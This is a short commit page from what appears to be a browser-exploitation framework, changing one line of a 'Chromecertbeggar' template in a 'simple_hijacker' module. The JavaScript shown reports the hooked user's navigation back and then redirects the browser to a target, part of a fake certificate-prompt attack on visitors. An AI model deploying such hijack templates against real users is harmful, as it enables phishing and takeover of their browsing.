Merge pull request #747 from gallypette/master
Small change in Chromecertbeggar template of simple_hijacker module
This commit is contained in:
@@ -12,7 +12,7 @@
|
||||
|
||||
forward = function(){
|
||||
send("User continuing to "+target);
|
||||
timer=setInterval(function(){window.location = target;},500);
|
||||
timer=setTimeout(function(){window.location = target;},500);
|
||||
}
|
||||
|
||||
getDomain = function(url){
|
||||
|
||||
Reference in New Issue
Block a user